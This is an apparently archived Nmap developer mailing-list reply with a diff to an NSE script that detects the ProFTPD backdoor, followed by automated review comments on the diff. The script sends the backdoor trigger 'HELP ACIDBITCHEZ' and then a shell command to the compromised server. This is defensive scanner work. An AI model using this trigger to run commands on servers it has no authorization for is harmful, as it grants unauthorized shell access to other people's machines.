Nmap Development mailing list archives
Re: [NSE] Detection of ProFTPD backdoor
From: Michael Meyer <michael.meyer () greenbone net>
Date: Mon, 13 Dec 2010 10:57:31 +0100
*** David Fifield <david () bamsoftware com> wrote:
On Sat, Dec 11, 2010 at 09:50:04AM +0100, Michael Meyer wrote:
+ sock:send("help foo\r\n")
+ sock:receive_lines(1)
Does it also work without the sock:send line?
Yes.
What about using the read_reply function from ftp-anon.nse, does that work?
Yes, the following seems to work. --- /tmp/2/nmap/scripts/ftp-proftpd-backdoor.nse 2010-12-08 14:09:07.000000000 +0100 +++ /usr/local/share/nmap/scripts/ftp-proftpd-backdoor.nse 2010-12-13 11:06:56.000000000 +0100 @@ -35,6 +35,45 @@ local CMD_FTP = "HELP ACIDBITCHEZ" local CMD_SHELL = "id" +local function read_reply(buffer) + local readline + local line, err + local code, message + local _, p, tmp + + line, err = buffer() + if not line then + return line, err + end + + -- Single-line response? + code, message = string.match(line, "^(%d%d%d) (.*)$") + if code then + return tonumber(code), message + end + + -- Multi-line response? + _, p, code, message = string.find(line, "^(%d%d%d)-(.*)$") + if p then + while true do + line, err = buffer() + if not line then + return line, err + end + tmp = string.match(line, "^%d%d%d (.*)$") + if tmp then + message = message .. "\n" .. tmp + break + end + message = message .. "\n" .. line + end + + return tonumber(code), message + end + + return nil, string.format("Unparseable response: %q", line) +end + portrule = function (host, port) -- Check if version detection knows what FTP server this is. if port.version.product ~= nil and port.version.product ~= "ProFTPD" then 
@@ -82,15 +121,16 @@ return end - -- Send command to escalate privilege. - status, err = sock:send(CMD_FTP .. "\r\n") - if not status then - stdnse.print_debug(1, "Failed to send privilege escalation command: %s", err) - sock:close() - return - end + -- Send command to escalate privilege. + buffer = stdnse.make_buffer(sock, "\r\n") + status, err = sock:send(CMD_FTP .. "\r\n") + if not status then + return status, err + end + code, message = read_reply(buffer) -- Send command(s) to shell, assuming that privilege escalation worked. status, err = sock:send(cmd .. ";\r\n") if not status then stdnse.print_debug(1, "Failed to send shell command(s): %s", err) ------------------------------------------------------------------------------------ Micha _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
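Review bot: the first hunk copies read_reply wholesale from ftp-anon.nse instead of sharing it, so the FTP reply parser now exists in two scripts that will drift apart; consider moving it into a shared library both scripts require. Within the copy, the declared `local readline` is never used and should be dropped, and the multi-line loop's terminator check `tmp = string.match(line, "^%d%d%d (.*)$")` accepts any three-digit code rather than the code that opened the reply, so a reply nested inside a multi-line block could end the loop early; matching against the captured `code` would be stricter.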
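Review bot: in the second hunk the result of `code, message = read_reply(buffer)` is never checked before the script goes on to `sock:send(cmd .. ";\r\n")`, so a closed connection or an unparseable reply (read_reply returns nil plus an error string) still leads to the shell command being sent and the response being interpreted; test `if not code then` and bail out, and it would be natural to act on the reply code here rather than discarding it. The new send-failure path `return status, err` also drops the `stdnse.print_debug` message and the `sock:close()` that the removed lines had, so the socket is leaked on that branch. Unless `buffer`, `code` and `message` are declared earlier outside this hunk, they are assigned as globals and should be made local.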